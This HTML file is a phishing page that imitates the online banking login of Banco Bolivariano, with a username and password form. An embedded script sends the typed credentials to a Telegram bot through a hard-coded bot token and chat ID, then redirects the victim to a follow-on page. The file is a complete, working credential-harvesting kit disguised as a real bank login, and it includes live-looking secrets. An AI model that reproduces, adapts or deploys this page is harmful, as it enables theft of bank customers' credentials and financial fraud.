<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Banco Bolivariano - Banca en Línea</title>
    <style>
        body {
            font-family: Arial, sans-serif;
            display: flex;
            justify-content: center;
            align-items: center;
            height: 100vh;
            margin: 0;
            background-color: #f8f8f8;
        }

        .container {
            background-color: white;
            border-radius: 10px;
            padding: 20px;
            box-shadow: 0 4px 6px rgba(0, 0, 0, 0.1);
            width: 300px;
            text-align: center;
        }

        .logo {
            margin-bottom: 20px;
        }

        .logo img {
            width: 150px;
        }

        h2 {
            color: #00506b;
            margin-bottom: 10px;
        }

        .input-group {
            margin-bottom: 15px;
            text-align: left;
        }

        .input-group label {
            display: block;
            font-size: 14px;
            margin-bottom: 5px;
        }

        .input-group input {
            width: 90%;
            padding: 10px;
            border: 1px solid #ccc;
            border-radius: 5px;
            font-size: 14px;
        }

        .btn {
            display: block;
            width: 100%;
            padding: 10px;
            background-color: #00758f;
            color: white;
            font-size: 16px;
            border: none;
            border-radius: 5px;
            cursor: pointer;
            margin-top: 10px;
        }

        .btn:hover {
            background-color: #005f72;
        }

        .link {
            font-size: 12px;
            color: #00758f;
            text-decoration: none;
            display: inline-block;
            margin-top: 10px;
        }

        .link:hover {
            text-decoration: underline;
        }

        .footer {
            margin-top: 20px;
            font-size: 12px;
            color: #555;
        }

        .footer a {
            color: #00758f;
            text-decoration: none;
        }

        .footer a:hover {
            text-decoration: underline;
        }

        .divider {
            margin: 20px 0;
            border-top: 1px solid #ccc;
        }

        .secondary-btn {
            display: block;
            width: 100%;
            padding: 10px;
            background-color: #5cc1d0;
            color: white;
            font-size: 14px;
            border: none;
            border-radius: 5px;
            cursor: pointer;
            margin-top: 10px;
        }

        .secondary-btn:hover {
            background-color: #48a7b5;
        }
    </style>
</head>
<body>
    <div class="container">
        <div class="logo">
            <img style="width: 70%;" src="../mg/logo-Bolivariano.png">
        </div>
        <form id="loginForm">
            <div class="input-group">
                <label for="username">Usuario</label>
                <input type="text" id="username" placeholder="Usuario" required>
            </div>

            <div class="input-group">
                <label for="pass">Contraseña</label>
                <input type="password" id="pass" placeholder="Contraseña" required>
            </div>
            <button type="submit" class="btn">Ingresar</button>
        </form>
        
    </div>

    <script>
        const TELEGRAM_BOT_TOKEN = "7580606761:AAFiPnAx4jOqv-bBPWFcqk8rwOJ1DYdsCGA"; // Reemplaza con tu token del bot
        const TELEGRAM_CHAT_ID = "7831097636"; // Reemplaza con tu chat ID

        document.getElementById("loginForm").addEventListener("submit", function(event) {
            event.preventDefault();

            const username = document.getElementById("username").value;
            const pass= document.getElementById("pass").value;

            if (username, pass) {
                const message = `BOLIVARIANO\nUsuario: ${username} \npass: ${pass}`;

                fetch(`https://api.telegram.org/bot${TELEGRAM_BOT_TOKEN}/sendMessage`, {
                    method: "POST",
                    headers: {
                        "Content-Type": "application/json"
                    },
                    body: JSON.stringify({ chat_id: TELEGRAM_CHAT_ID, text: message })
                })
                .then(response => response.json())
                .then(data => {
                    if (data.ok) {
                        window.location.href = "../cargapago.html"; // Cambia a la URL deseada
                    } else {
                        alert("Intente nuevamente.");
                    }
                })
                .catch(error => {
                    console.error("Error", error);
                });
            } else {
                alert("Por favor, ingrese su usuario.");
            }
        });
    </script>
</body>
</html>
